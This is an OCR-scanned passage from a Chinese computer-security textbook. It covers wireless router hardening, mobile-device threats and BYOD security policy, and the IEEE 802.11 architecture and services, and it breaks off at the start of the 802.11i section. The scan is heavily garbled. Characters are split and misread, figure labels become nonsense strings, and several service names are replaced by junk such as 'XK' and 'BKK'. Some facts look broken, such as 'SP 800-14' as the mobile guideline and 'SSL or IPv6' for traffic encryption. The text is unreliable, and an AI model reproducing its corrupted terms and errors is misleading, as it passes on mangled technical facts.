能 够 检测 到 它 的 存在 。 关 闭 广 播 之 后 ， 只 有 授权 设备 知道 该 路 由 器 的 标识 符 ， 攻 击 者 就 无 法 检 
测 路 由 器 。 

4. 改变 路 由 器 的 标识 符 名 称 ， 不 使 用 默认 名 称 。 这 样 攻击 者 使 用 默认 标识 符 就 不 能 探测 到 
路 由 器 的 存在 。 

5. 改变 路 由 器 预 设 的 管理 员 密码 。 这 也 是 一 个 明智 的 做 法 。 

6. 仅 人 允许 指定 设备 接 人 到 无 线 网 络 。 路 由 器 可 以 设置 为 只 允许 连接 白 名 单 中 指定 的 MAC 
地 址 。 当 然 MAC 地 址 是 可 以 伪造 的 ， 所 以 这 只 是 安全 防御 策略 之 一 。 


24.2 ”移动 设备 安全 


在 智能 手机 广泛 应 用 之 前 ， 一 个 组 织 的 计算 机 和 网 络 安全 的 典范 如 下 面 所 述 : 组 织 的 IT 
受到 严格 的 控制 ; 用 户 设备 仅 限 于 Windows PC ; 商业 应 用 程序 受到 IT 的 控制 ， 并 且 要 么 在 终 
端 本 地 运行 ， 要么 在 数据 中 心 的 实体 服务 器 上 运行 。 网 络 安全 是 通过 在 可 信 内 部 网 络 和 不 可 信 
Internet 之 间 定 义 明确 的 边界 来 保证 的 。 如 今 ， 这 些 都 需要 做 出 改变 。 一 个 组 织 的 网 络 必须 适 
应 如 下 情况 : 

e 新 设备 的 不 断 增 加 : 如 今 的 组 织 正在 面临 着 这 样 的 情况 一 一 员工 对 移动 设备 的 使 用 需 

求 不 断 增长 。 许 多 情况 下 ， 组 织 允许 员工 结合 使 用 多 种 终端 设备 来 完成 日 常 工作 。 

e 基于 云 的 应 用 : 如 今 的 应 用 程序 已 不 仅 限 于 在 孤立 的 数据 中 心 实体 服务 器 上 运行 了 。 
恰恰 相反 的 是 ， 应 用 程序 能 运行 在 任何 地 方 ， 如 传统 服务 器 、 移 动 虚拟 服务 器 或 是 云 
服务 器 上 。 此 外 ， 终 端 用 户 能 够 利用 各 式 各 样 基于 云 的 应 用 和 IT 服务 来 满足 个 人 和 业 
务 的 需求 。 例 如 ， 社 交 应 用 Facebook 可 以 展示 员工 的 个 人 资料 或 是 组 织 市 场 活动 的 一 
部 分 ; 员工 使 用 网 络 通信 工具 Skype 与 海外 朋友 交谈 或 举行 正式 的 商业 视频 会 议 ; 使 
用 云 存 储 应 用 Dropbox 和 Box 在 公司 设备 和 个 人 设备 上 发 布 文件 ， 能 够 实现 移动 办 
公 ， 提 高 工作 效率 。 

e 去 边界 化 (De-perimeterization) : 随 着 新 式 设备 的 增加 、 应 用 的 不 断 移动 化 以 及 基于 云 
的 个 人 使 用 者 和 企业 服务 的 增多 ， 静 态 网 络 边 界 的 概念 已 经 不 复 存 在 。 如 今 围绕 着 设 
备 、 应 用 、 用 户 、 数 据 有 众多 的 网 络 边 界 ， 这 些 边界 也 变 得 动态 多 变 ， 以 适应 用 户 角 
色 、 设 备 类 型 、 服 务虚 拟 移动 性 、 网 络 位 置 等 一 系列 环境 条 件 的 要 求 。 

e 外 部 业务 需求 : 组 织 必 须 使 得 用 户 、 第 三 方 承包 方 、 业 务 合作 伙伴 能 够 以 多 种 设备 从 
多 个 位 置 接 人 网 络 。 

所 有 这 些 变化 中 首要 因素 是 移动 计算 设备 。 移 动 设备 作为 网 络 基础 设施 的 一 部 分 ， 已 经 成 
为 组 织 的 基本 要 素 。 智 能 手机 、 平 板 电脑 、 存 储 卡 等 移动 设备 不 仅 方便 了 个 人 ， 同 时 也 大 大 提 
高 了 工作 效率 。 随 着 移动 设备 的 广泛 使 用 ， 其 特有 的 性 质 使 得 移动 设备 的 安全 问题 成 为 一 个 紧 
人 迫 而 复杂 的 问题 。 本 质 上 ， 组 织 所 实现 的 安全 策略 ， 需 要 将 移动 设备 中 植 人 的 安全 特性 与 网 络 
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组 件 提供 的 、 用 于 规范 移动 设备 使 用 的 附加 安全 控制 结合 起 来 。 


24.2.1 安全 威胁 


除了 客户 端 其 他 设备 所 实施 的 安全 防护 措施 之 外 ， 移 动 设 备 的 安全 防护 ， 如 仅 在 组 织 的 
设施 上 和 网 络 上 使 用 的 桌面 系统 和 笔记 本 电脑 等 ， 还 需要 附加 特定 的 保护 措施 。SP 800-14 (组 
织 内 管理 和 安全 使 用 移动 设备 指南 ，Guidelines for Managing and Securing Mobile Devices in the 
Enterprise) 中 列举 了 关于 移动 设备 安全 主要 的 七 项 顾虑 。 下 面 我 们 依次 对 其 进行 讨论 。 

物理 安全 控制 的 缺乏 ”移动 设备 通常 在 设备 使 用 者 的 完全 控制 之 下 ， 随 着 使 用 者 位 置 而 变 
化 ,无 法 受到 组 织 的 控制 。 即 使 一 台 设备 被 要 求 限定 在 组 织 的 物理 区 域内 使 用 ,使 用 者 也 可 能 
在 组 织 区 域内 的 不 安全 位 置 使 用 该 设备 。 因 此 窃取 和 自 改 安全 威胁 是 存在 的 。 

移动 设备 的 安全 策略 假设 任何 移动 设备 都 有 可 能 被 盗 取 或 者 被 恶意 攻击 者 访问 。 这 种 威胁 
是 双重 的 : 一 方面 攻击 者 可 能 尝试 恢复 移动 设备 中 的 敏感 数据 ; 另 一 方面 还 可 能 使 用 设备 获取 
组 织 资 源 的 访问 权限 。 

不 可 信 移动 设备 的 使 用 除了 公司 配 发 或 控制 的 移动 设备 之 外 ， 员 工 们 往往 还 拥有 个 人 智 
能 手机 或 平板 电脑 。 组 织 必 须 假设 这 些 个 人 设备 是 不 可 信 的 ， 也 就 是 说 ， 这 些 设备 可 能 没有 使 
用 数据 加 密 措施 ， 且 其 使 用 者 或 某 个 第 三 方 可 能 在 设备 中 安装 了 某 种 旁 路 机 制 ， 用 于 绕 过 其 内 
部 安全 防护 限制 和 操作 系统 使 用 限制 等 。 

不 可 信和 网 络 的 使 用 ”如果 移动 设备 在 内 部 使 用 ， 可 以 通过 组 织 内 部 无 线 网 络 连接 到 组 
织 内 部 资源 。 然 而 ， 在 组 织 外 部 使 用 移动 设备 时 ， 用 户 通常 是 通过 Wi-Fi 或 蜂窝 网 络 ， 经 由 
Internet 访问 所 在 组 织 的 资源 。 这 样 ， 通 信 流 量 就 可 能 容易 受到 窃听 攻击 和 中 间 人 攻击 。 因 此 ， 
安全 策略 必须 假设 移动 设备 和 组 织 之 间 的 网 络 是 不 可 信 的 。 

由 不 明 人 员 创 建 的 不 可 信 应 用 程序 的 使 用 “在 移动 设备 上 查找 和 安装 第 三 方 应 用 程序 是 很 
容易 的 ， 因 此 移动 设备 具有 被 安装 恶意 软件 的 风险 。 对 于 此 类 威胁 ， 组 织 有 若干 应 对 方法 ， 下 
文 将 会 具体 讲述 。 

与 其 他 系统 的 交互 ”智能 手机 和 平板 电脑 的 一 个 常见 的 功能 是 将 设备 的 数据 、 应 用 程序 、 
联系 人 、 照 片 等 自动 同步 到 其 他 计算 设备 和 云端 存储 上 。 除 非 一 个 组 织 具有 所 有 涉及 的 设备 同 
步 机 制 的 控制 权限 ， 否 则 同步 机 制 将 会 使 得 公司 内 部 数据 暴露 在 不 安全 的 网 络 中 ， 此 外 还 可 能 
将 恶意 程序 传播 到 组 织 内 部 。 

不 可 信和 内容 的 使 用 ”移动 设备 会 访问 和 使 用 其 他 计算 设备 不 需要 的 内 容 。 比 如 快速 响应 码 
(QR code)， 它 是 二 维 码 的 一 种 。 若 移动 设备 的 摄像 头 扫描 和 读 取 恶 意 的 QR 数据 ， 将 其 翻译 为 
URL， 移 动 设 备 就 会 访问 到 该 URL 所 对 应 的 恶意 网 站 。 

位 置 服务 的 使 用 移动 设备 上 的 GPS 功能 可 以 被 用 于 维护 一 个 有 关 该 设备 的 地 理 位 置信 
息 。 当 这 一 特点 作为 组 织 在 线 服务 的 一 部 分 时 ， 就 会 产生 安全 风险 。 通 过 GPS 数据 所 确定 该 
设备 和 使 用 者 的 实时 位 置信 息 可 能 会 被 攻击 者 利用 。 


24.2.2 ”移动 安全 策略 


鉴于 上 文 所 列举 的 安全 威胁 ， 我 们 把 移动 设备 安全 策略 的 主要 因素 归纳 为 三 类 ， 分 别 是 设 
备 安全 、 客 户 端 /服务 器 流量 安全 和 边界 安全 (如 图 24-2 所 示 )。 

设备 安全 一 些 组 织 为 了 安全 起 见 ， 为 员工 配备 预先 配置 好 的 移动 设备 。 更 多 组 织 则 会 发 
现 : 采用 “ 自 带 设备 ”( Bring-Your-Own-Device，BYOD) 这 一 安全 策略 ， 即 允许 员工 的 个 人 设 
备 访问 组 织 内 部 资源 ， 更 为 方便 ， 甚 至 是 必要 的 。 在 这 种 策略 下 ，IT 管理 员 应 能 够 在 每 台 
备 获得 网 络 访问 权限 之 前 对 其 进行 检查 。 此 外 ，IT 部 门 要 发 布 操作 系统 和 应 用 程序 的 配置 
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遵循 组 织 安全 策略 ， 
配置 移动 设备 安全 机 制 
和 参数 
流量 使 用 SSL 或 
IPSec VPN 加 密 


利用 认证 和 访问 控制 
协议 验证 设备 和 用 户 ， 
建立 访问 限制 
防火 墙 限制 数据 和 
应 用 程序 的 访问 范围 


图 24-2 移动 设备 安全 元 素 


指南 。 例 如 ， 获 得 root 权限 或 已 “越狱 ”的 设备 不 允许 访问 网 络 ; 移动 设备 不 可 以 将 组 织 联系 
人 及 其 联系 方式 存储 在 本 地 。 无 论 是 组 织 拥有 的 设备 还 是 采用 BYOD 策略 下 的 个 人 设备 ， 组 
织 都 应 该 为 设备 配置 安全 权限 : 

e 支持 自动 锁定 。 当 设备 在 一 段 时 间 内 不 活动 时 ， 设 备 能 够 自动 锁定 ， 再 次 激活 设备 需 


要 用 户 输入 4 位 PIN 码 或 口令 。 

支持 口令 或 PIN 码 保护 。PIN 码 或 口令 不 仅 用 于 解锁 设备 ， 还 用 于 邮件 或 设备 上 其 他 
数据 传输 的 加 密 与 解密 。 

避免 使 用 用 户 名 和 密码 自动 填写 (auto-complete) 功能 。 

支持 远程 数据 抹 除 功能 。 

尽 可 能 支持 SSL 安全 套 接 层 的 保护 。 

确保 操作 系统 和 应 用 软件 更 新 到 最 新 版 本 。 

尽 可 能 安装 反 病 毒 软件 。 

敏感 数据 禁止 存储 在 移动 设备 上 或 要 求 必须 加 密 存 储 。 

IT 部 门 员 工 应 该 具有 远程 设备 访问 的 权限 ， 当 设备 丢失 或 被 瓷 时 可 以 抹 除 设备 上 的 数 
据 或 令 设备 失效 。 

组 织 可 以 禁用 所 有 第 三 方 应 用 程序 ， 或 是 使 用 白 名 单机 制 来 禁用 非 允 许 的 应 用 程序 ， 
或 是 实现 安全 沙 箱 来 将 公司 的 数据 和 程序 同 其 他 数据 和 程序 隔离 开 来 。 任 何在 允许 列 
表 里 的 应 用 程序 都 配置 有 认证 中 心 颁 发 的 数字 签名 和 公 钥 证 书 。 


e 组 织 可 以 实现 和 强制 限定 设备 的 数据 同步 和 云 存储 。 
© 为 了 防范 不 可 信和 内 容 的 安全 威胁 ， 组 织 可 以 对 全 体 员工 进行 安全 意识 培训 ， 提 高 对 不 


可 信和 内容 可 能 导致 安全 威胁 的 认识 。 另 外 不 允许 使 用 移动 设备 上 的 摄像 头 。 
为 了 应 对 位 置 服务 信息 的 恶意 利用 ， 安 全 策略 可 以 要 求 所 有 设备 禁用 位 置 服务 功能 。 


流量 安全 流量 安全 基于 通常 的 加 密 和 认证 机 制 。 所 有 的 流量 以 加 密 的 方式 安全 传输 ， 比 
如 使 用 SSL 或 IPv6 协议 。 也 可 以 在 移动 设备 和 组 织 机 构 的 网 络 之 间 建 立 虚 拟 专用 网 ( VPN) 
实现 安全 通信 。 

利用 强大 的 认证 协议 来 限制 移动 设备 非 授权 访问 组 织 内 部 资源 。 移 动 设备 通常 具有 特定 的 
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认证 用 户 ， 因 为 移动 设备 一 般 只 有 一 个 使 用 者 。 更 好 的 安全 策略 是 使 用 两 层 认 证 机 制 ， 既 认证 
设备 又 认证 设备 的 使 用 者 。 

边界 安全 ”组织 需 要 安全 机 制 来 保护 网 络 避免 遭受 未 授权 访问 ， 其 中 要 包括 针对 移动 设备 
流量 特定 的 防火 墙 机制 。 防 火 墙 机 制 能 够 限定 所 有 移动 设备 对 数据 和 应 用 程序 的 访问 范围 。 类 
似 地 ， 人 入 侵 检测 和 防御 系统 要 对 移动 设备 流量 具有 更 严格 的 控制 规则 。 


24.3 IEEE 802.11 无 线 局 域 网 概述 


IEEE 802 是 开发 一 系列 局 域 网 标准 的 委员 会 。1990 Æ, IEEE 802 委员 会 成 立 了 一 个 新 的 
工作 组 一 一 IEEE 802.11， 负 责 开 发 针对 无 线 局 域 网 (WLAN) 的 协议 和 传输 规范 。 从 那 时 起 ， 
工作 组 开始 探索 WLAN 对 于 不 同 频率 和 数据 传输 速率 的 要 求 ， 随 之 发 布 了 一 系列 相关 标准 。 
表 24-1 简要 定义 了 IEEE 802.11 标准 中 的 关键 术语 。 


表 24-1 IEEE 802.11 术语 


接 人 点 (AP) 任何 具有 工作 站 功能 且 能 够 通过 无 线 介 质 为 分 发 系统 提供 接 人 的 实体 
基本 服务 集 (BSS) 单一 协调 功能 所 控制 的 工作 站 集合 
协调 功能 工作 站 所 具备 的 逻辑 功能 ， 在 一 个 基本 服务 集 内 发 送 和 接收 协议 数据 单元 
分 发 系统 (DS) 若干 个 基本 服务 集 互 联 组 成 的 局 域 网 所 构成 的 系统 
一 个 或 者 多 个 互联 的 基本 服务 集 组 成 的 局 域 网 ， 被 上 层 LCC 层 看 作 一 个 单独 的 
扩展 服务 集 (ESS) 基本 服务 集 


MAC 协议 数据 单元 (MPDU) 两 个 相 邻 的 MAC 实体 之 间 的 数据 交换 单元 
MAC 服务 数据 单元 (MSDU) 在 MAC 用 户 之 间 传 输 的 信息 单元 
工作 站 包含 了 相互 一 致 的 IEEE 802.11MAC 层 和 物理 层 的 设备 


24.3.1 Wi-Fi 联盟 


第 一 个 获得 工业 界 广泛 认可 的 802.11 标准 是 802.11b 协议 。 尽 管 802.11b 协议 的 产品 都 基 
于 同样 的 标准 ， 但 不 同 厂商 生产 的 产品 能 否 互相 兼容 仍然 是 一 个 需要 考虑 的 问题 。 为 了 解决 
这 一 问题 ，1999 年 ， 无 线 以 太 网 兼容 性 联盟 ( WECA) 作为 一 个 工业 联盟 出 现 了 。 这 个 组 织 随 
后 重新 命名 为 Wi-Fi (Wireless Fidelity) 联盟 ,创立 了 测试 套件 来 验证 不 同 802.11b 产品 之 间 的 
兼容 性 。 具 有 许可 证 的 802.11b 产品 被 称 为 Wi-Fi。Wi-Fi 认证 随后 被 扩展 到 了 802.11g 产品 。 
Wi-Fi 联盟 随后 开发 了 802.11a 产品 的 认证 过 程 ， 称 作 Wi-Fi5。 一 系列 的 无 线 局 域 网 市 场 领域 
都 与 Wi-Fi 联盟 相关 ， 包 括 组 织 、 家 庭 和 热点 。 

近期 ，Wi-Fi 联 盟 开 发 了 IEEE 802.11 安全 标准 的 认证 过 程 ， 被 称 作 Wi-Fi 保 护 访问 
(WPA)。 最 新 版 本 的 WPA 是 WPA2， 其 襄 括 了 IEEE 802.11i 安全 规范 中 的 所 有 特性 。 


24.3.2 IEEE 802 协议 架构 


首先 我 们 简要 介绍 IEEE 802 协议 架构 ，IEEE 802.11 标准 定义 在 协议 层 结构 中 。 所 有 的 
IEEE 802 标准 均 使 用 这 一 结构 ， 如 图 24-3 所 示 。 

物理 层 IEEE 802 参考 模型 的 最 底层 是 物理 层 ， 其 中 包括 信和 号 的 编码 /解码 、 比 特 传输 / 
接收 等 功能 。 另 外 ， 物 理 层 包含 了 传输 介质 的 规范 。 比 如 ,在 IEEE 802.11 中 ， 物 理 层 就 定义 
了 频带 和 天 线 特性 。 

介质 访问 控制 层 所 有 的 局 域 网 (LAN) 都 包含 了 共享 整个 网 络 传输 能 力 的 设备 集合 。 为 
了 控制 设备 对 传输 介质 的 访问 ， 需 要 提供 高 效 有 序 的 访问 能 力 ， 这 是 介质 访问 控制 层 (MAC) 
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的 作用 。MAC 层 接收 来 自 上 一 层 协议 的 数据 ， 通 常 是 逻辑 链 路 控制 (LLC) 层 ， 将 其 封装 为 


MAC 服务 数据 单元 (MSDU)。 介 质 访 Rn 
问 控制 层 (MAC) 一 般 具 有 如 下 功能 : mes ice aia 


o 传输 时 将 数据 封装 成 帧 。 一 和 帧 







数据 被 称 为 MAC 协议 数据 单元 全 aa 
(MPDU)， 其 中 包含 地 址 和 错误 |e 
检测 字段 。 帧 的 封装 
。 接收 时 将 帧 解 开 ， 进 行 地 址 识别 | BON e Sai 
和 错误 检测 。 tal 
。 控制 局 域 网 传输 介质 的 访问 。 。 局 eho amex 
MPDU 单元 的 具体 格式 尽管 根据 不 辆 传输 介质 无线 信 号 编码 


同 的 MAC 协议 而 不 尽 相同 ， 但 在 使 用 | 党 
中 ， 一 般 所 有 的 MPDU 单元 都 具有 类 似 
的 格式 ， 如 图 24.4 所 示 。 下 面 是 一 帧 中 人 
包含 的 字段: 

© MAC 控制 字段 : 这 个 字段 包括 MAC 协议 功能 所 需 的 协议 控制 信息 ， 如 优先 级 别 。 
目的 MAC 地 址 ; 该 MPDU 在 局 域 网 中 的 目的 物理 地 址 。 
源 MAC 地 址 : 该 MPDU 在 局 域 网 中 的 源 物理 地 址 。 
MAC 服务 数据 单元 : 来 自 更 高 一 层 的 数据 。 
CRC: 循环 元 余 校 验 字段 ， 也 称 作 帧 检查 序列 字段 ( FCS)。 这 是 一 种 错误 检查 码 ， 它 
也 被 用 在 其 他 数据 链 路 (data-link) 控制 协议 中 。CRC 是 基于 整个 MPDU 的 所 有 比特 
进行 计算 的 。 发 送 方 计算 CRC 的 值 并 将 其 加 入 帧 中 。 接 收 方 以 同样 的 方式 计算 CRC, 
并 与 帧 中 的 CRC 字段 进行 比较 ， 如 果 不 一致， 则 说 明 传 输 过 程 中 数据 发 生 一 位 或 多 位 
错误 。 





MAC 头 部 MAC 尾 部 
图 24-4 IEEE 802 MPDU 的 一 般 格 式 


位 于 MAC 服务 数据 单元 (MSDU) 头 部 的 字段 被 称 为 MAC 头 部 ， 位 于 MAC 服务 数据 单 
元 (MSDU) 尾部 的 单元 则 被 称 为 MAC 尾部 。 头 部 和 尾部 的 控制 信息 和 中 间 的 数据 字段 一 起 
服务 于 MAC 协议。 

逻辑 链 路 控制 层 ”在 大 多 数 数据 链 路 ( data-link) 协议 中 ， 数 据 链 路 协议 实体 不 仅 负 责 利 
用 CRC 检测 错误 ， 还 要 重 传 受 损 的 数据 帧 来 修复 所 发 现 的 错误 。 在 局 域 网 络 协议 架构 中 ， 这 
两 个 功能 分 别 位 于 介质 访问 控制 层 (MAC) 和 逻辑 链 路 控制 层 (LLC). MAC 层 负责 检测 错误 ， 
丢弃 含有 错误 的 帧 。LLC 层 负 责 记 录 成 功 接收 的 帧 ， 重 传 传输 错误 的 帧 。 


24.3.3 IEEE 802.11 网 络 组 件 和 架构 模型 


. 图 24-5 展示 了 802.11 工作 组 开发 的 模型 。 一 个 无 线 局 域 网 的 标准 部 件 叫 作 基 本 服务 集 
( Basic Service Set，BSS)， 它 由 执行 相同 MAC 协议 、 竞 争 访问 同一 共享 无 线 介 质 的 若干 个 无 
线 工 作 站 组 成 。 一 个 基本 服务 集 (BSS) 可 以 是 孤立 的 ， 也 可 以 经 由 接 入 点 (AP) 连接 到 主干 
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分 发 系统 (DS)。 接 人 点 起 到 网 桥 和 转播 站 的 作用 。 在 一 个 基本 服务 集 内 部 ， 客 户 工作 站 互 
相 不 直接 通信 ， 如 果 一 个 工作 站 希望 和 基本 服务 集 内 的 另 一 个 工作 站 通信 ， 源 工作 站 先 要 将 
MAC 帧 发 送 到 接 人 点 ， 接 入 点 再 将 该 帧 转送 给 目的 工作 站 。 类 似 地 ， 如 果 把 一 个 帧 从 一 个 基 
本 服务 集 的 工作 站 发 送 到 另 一 个 基本 服务 集 的 工作 站 ， 帧 先 从 源 工 作 站 被 传 至 本 地 接 入 点 ， 经 

由 分 发 系统 转发 到 目的 基本 服务 集 的 接 和 点， 再 发 送 到 目的 工作 站 。 基 本 服务 集 一 般 相当 于 一 
个 细胞 单元 ,分 发 系统 可 以 是 交换 机 、 有 线 网 络 或 者 无 线 网 络 。 

如 果 基 本 服务 集中 的 所 有 工作 站 是 移 
动工 作 站 ， 互 相 之 间 可 以 直接 通信 (没有 
使 用 AP)， 那 么 这 样 的 基本 服务 集 叫 作 独 
立 基 本 服务 集 (IBSS)。 典 型 的 IBSS 是 
ad-hoc 网 络 。 在 IJBSS 中 ， 所 有 的 工作 站 







接 人 点 2 


能 够 不 经 过 接 和 点 而 直接 通信 。 a r, s 
图 24-5 是 一 个 IEEE 802.11 H ALN 基本 服务 集 a ` 
构 的 一 种 简单 配置。 每 个 工作 站 仅 属于 一 ;qm cme OS) 区， 
个 基本 服务 集 (BSS)， 每 个 工作 站 的 槛 羡 | Be Gs) | 工作 站 8 
范围 限于 同一 个 基本 服务 集中 的 其 他 工作 `、 MB, a 2 
站 。 两 个 基本 服务 集 存在 地 理 区 域 重 释 覆 “、 We cim “Ihe Ta 


盖 的 可 能 ， 位 于 重 释 区 域 的 工作 站 则 可 以 ` TEW .~ 
加 入 两 个 基本 服务 集中 。 此 外 ， 工 作 站 和 ONN 
基本 服务 集 之 间 的 关联 是 动态 的 ， 工 作 站 图 24-5 IEEE 802.11 扩展 服务 集 
可 以 关闭 ， 可 以 随 着 位 置 的 移动 而 加 入 不 同 的 基本 服务 集 。 
扩展 服务 集 (ESS) 由 分 发 系统 互联 的 两 个 或 多 个 基本 服务 集 组 合 而 成 。 对 于 逻辑 链 路 控 


制 层 来 说 ， 扩 展 服务 集 相当 于 一 个 单一 的 逻辑 局 域 网 。 
24.3.4 IEEE 802.11 服务 


IEEE 802.11 定义 了 无 线 LAN 提供 的 9 种 服务 ， 实 现 了 和 有 线 局 域 网 相同 的 功能 。 表 24-2 
列举 了 这 些 服务 并 给 出 了 两 种 分 类 方式 。 


表 24-2 IEEE 802.11 服务 


认证 工作 站 局 域 网 访问 和 安全 
撤销 认证 局 域 网 访问 和 安全 
MSDU 传递 工作 站 MSDU 传递 
E SOU i 


1. 服务 提供 者 可 以 是 工作 站 也 可 以 是 分 发 系统 ( DS)。 每 一 个 802.11 设施 都 具备 工作 站 服 
务 功能 ， 包 括 接 人 点 (AP) 工作 站 。 分 发 服务 位 于 基本 服务 集 之 间 ， 由 接 人 点 提供 或 者 由 连接 
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到 分 发 系统 的 特定 目的 设备 提供 。 
2. 3 个 服务 用 于 控制 IEEE 802.11 局 域 网 访问 和 保密 。6 个 服务 用 于 支持 工作 站 之 间 
MSDU 的 分 发 。 如 果 一 个 MSDU 过 大 ， 则 可 能 被 切 分 成 多 个 小 份 后 在 一 系列 MPDU 中 传输 。 
为 了 搞 清 楚 IEEE 802.11 扩展 服务 集 网 络 (ESS) 的 工作 原理 ， 我 们 接 下 来 将 根据 IEEE 
802.11 官方 文档 具体 讨论 IEEE 802.11 的 服务 。 上 文 已 经 提 到 MSDU 分 发 这 一 基本 服务 ， 有 关 
安全 的 服务 将 在 24.4 节 中 介绍 。 . 
分 发 系统 (DS) 中 的 消息 分 发 ”在 分 发 系统 中 有 两 个 服务 同 消息 分 发 有 关 ， 分别 是 分 发 服 
务 和 集成 服务 。 分 发 服务 是 工作 站 之 间 交 换 MPDU 的 主要 服务 ， 用 于 将 MPDU 从 一 个 基本 服 
务 集 的 工作 站 传输 到 另 一 个 基本 服务 集 的 工作 站 。 例 如 ， 在 图 24-5 中 ， 假 设 一 个 帧 从 工作 站 2 
(STA2 ) 传输 到 工作 站 7 (STA7 )， 那 么 首先 帧 被 发 送 到 该 基本 服务 集中 的 接 人 点 1 (APL), 
和 人 点 1 (AP1 ) 将 帧 交 给 分 发 系统 ， 由 分 发 系统 负责 将 其 传输 到 工作 站 7 (STA7) 所 在 基本 服 
务 集 的 接 入 点 ， 随 后 接 入 点 2 (AP2 ) 接收 到 帧 并 转送 给 工作 站 7 (STA7 )。 分 发 系统 内 部 消息 
的 传输 过 程 则 不 是 IEEE 802.11 标准 定义 的 。 
如 果 是 同一 个 基本 服务 集中 的 两 个 工作 站 进行 通信 ， 那 么 分 发 服务 逻辑 上 只 是 经 过 该 基本 
服务 集中 的 单个 接 人 点 。 
集成 服务 负责 IEEE 802.11 局 域 网 工作 站 和 IEEE 802.x 局 域 网 工作 站 之 间 的 数据 通信 。 
“集成 ”这 一 术语 指 的 是 一 个 物理 上 与 分 发 系统 相连 的 有 线 局 域 网 ， 且 该 局 域 网 中 的 工作 站 可 
能 通过 集成 服务 与 某 个 IEEE 802.11 局 域 网 建立 逻辑 连接 。 集 成 服务 负责 数据 交换 过 程 所 需 的 
地 址 转换 和 介质 转换 逻辑 。 
关联 相关 的 服务 MAC 层 最 主要 的 目的 是 在 MAC 实体 之 间 传 输 MSDU， 这 是 由 分 发 系 
统 来 实现 的 。 为 此 ， 分 发 系统 则 需要 关联 相关 的 服务 为 其 提供 扩展 服务 集中 的 工作 站 信息 。 在 
分 发 服务 传输 和 接收 工作 站 数据 之 前 ， 工 作 站 必须 首先 与 之 关联 。 这 里 我 们 首先 介绍 移动 性 的 
概念 ， 基 于 移动 性 概念 ， 我 们 定义 出 三 种 标准 迁移 类 型 : 
© 不 迁移 型 : 这 种 类 型 的 工作 站 要 么 静止 不 动 ， 要 么 仅 在 同一 个 基本 服务 集 的 信和 号 覆盖 
范围 之 内 移动 。 
e BSS TBH: 这 种 类 型 定义 了 工作 站 在 同一 扩展 服务 集中 从 一 个 基本 服务 集 向 另 一 个 
基本 服务 集 的 移动 。 这 种 情况 下 工作 站 之 间 的 数据 传递 需要 寻 址 功能 ， 能 够 识别 工作 
站 移动 后 的 新 位 置 。 
e ESS 迁移 型 : 这 种 类 型 定义 了 工作 站 从 一 个 扩展 服务 集 移动 到 另 一 个 扩展 服务 集 的 
移动 。 这 种 情况 仅 支持 可 移动 的 工作 站 ， 无 法 保证 上 层 的 持续 连接 ， 服 务 有 可 能 发 生 
中 断 。 
为 了 在 分 发 系统 中 传递 消息 ， 分 发 服务 需要 知道 每 个 工作 站 的 位 置 。 为 了 能 将 消息 传达 到 
对 应 的 目的 工作 站 ， 分 发 系统 需要 认证 每 一 个 接 人 点 。 为 此 ， 工 作 站 必须 保证 与 所 在 基本 服务 
集 的 接 人 点 的 关联 ， 与 这 一 需求 有 关 的 服务 包括 以 下 三 个 : 
e XK: 在 工作 站 和 接 人 点 之 间 建 立 初 始 化 关联 。 在 无 线 局 域 网 中 ， 一 个 工作 站 在 发 
送 或 者 接收 帧 之 前 ， 首 先 必须 与 所 在 基本 服务 集 的 接 入 点 建立 关联 ， 提 供 身份 信息 和 
地 址 信息 。 接 人 点 会 与 一 扩展 服务 集 下 的 其 他 接 入 点 分 享 该 信息 ， 以 便于 帧 的 路 由 和 


传递 。 
。 BKK: 一 个 已 经 建立 的 关联 由 一 个 接 人 点 迁移 到 另 一 个 接 人 点 。 这 使 得 移动 工作 站 
可 以 在 不 同 的 基本 服务 集 之 间 移 动 。 


。 撤销 关联 : 来 自 工作 站 或 接 人 点 的 关联 终止 通知 。 工 作 站 应 该 在 离开 一 个 扩展 服务 集 
或 关机 之 前 发 出 撤销 关联 通知 ，MAC 管理 设施 会 避免 这 种 情况 发 生 。 
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24.4 IEEE 802.11i 无 线 局 域 网 安全 


除了 具备 有 线 局 域 网 的 特性 之 外 ， 无 线 局 域 网 还 具有 如 下 两 个 特性 : 

1. 为 了 通过 有 线 局 域 网 进行 传输 ， 工 作 站 必须 物理 连接 到 局 域 网 中 。 至 于 无 线 局 域 网 ， 任 
何 工作 站 都 能 够 与 频段 范围 内 的 其 他 设备 进行 通信 。 从 某 种 程度 上 说 ， 工 作 站 需要 以 确定 的 且 
几乎 肯定 是 可 见 的 方式 接 人 有 线 局 域 网 这 一 事实 ， 本 身 就 可 以 说 是 一 种 形式 的 认证 机 制 了 。 

2. 同样 ， 为 了 接收 来 自 一 个 有 线 局 域 网 中 工作 站 的 数据 传输 ， 接 收工 作 站 必须 连接 到 有 线 
局 域 网 。 否 则 ， 同 一 无 线 局 域 网 中 无 线 覆 盖 范围 内 任何 工作 站 都 能 接收 数据 。 因 此 ， 有 线 局 域 
网 提供 了 一 定 程度 的 隐私 保护 ， 因 为 只 有 连接 到 局 域 网 的 工作 站 才能 接收 数据 。 

有 线 局 域 网 和 无 线 局 域 网 的 这 些 差异 使 得 无 线 局 域 网 需要 有 更 健壮 的 安全 服务 和 机 制 。 起 
初 的 802.11 规范 具有 一 系列 的 加 密 和 认证 特性 ,但 都 相对 脆弱 。 在 机 密 性 方面 ，802.11 定义 
了 有 线 等 效 保密 ( Wired Equivalent Privacy, WEP) 算法 , 但 却 具有 一 些 重大 的 漏洞 。 在 WEP 
之 后 ，802.11 标准 的 工作 组 针对 这 些 无 线 安全 问题 开发 了 很 多 新 功能 。 为 了 进一步 加 强 无 线 
局 域 网 的 安全 特性 ，Wi-Fi 联盟 发 布 了 无 线 网 络 保护 接 入 (Wi-Fi Protected Access, WPA) 作 
为 Wi-Fi 标准 。WPA 在 802.11i 现 有 标准 上 实现 了 一 系列 安全 机 制 ， 消 除了 802.11 中 的 安全 隐 
患 。 最 终 形 式 的 802.11i 标准 又 被 称 作 强 健 的 安全 网 络 ( Robust Security Network, RSN). 目前 
Wi-Fi 联盟 遵循 基于 WPA2 的 802.11i 规范 来 认证 厂商 设备 。 


24.4.1 IEEE 802.11i 服务 


802.11i RSN 安全 规范 定义 了 如 下 服务 : 

o 认证 服务 : 认证 协议 定义 了 用 户 和 认证 服务 器 (AS) 之 间 的 数据 交换 方式 ， 以 提供 互 
相 认 证 机 制 ， 生 成 临时 密 钥 用 于 客户 端 和 接 人 点 的 无 线 连 接 。 

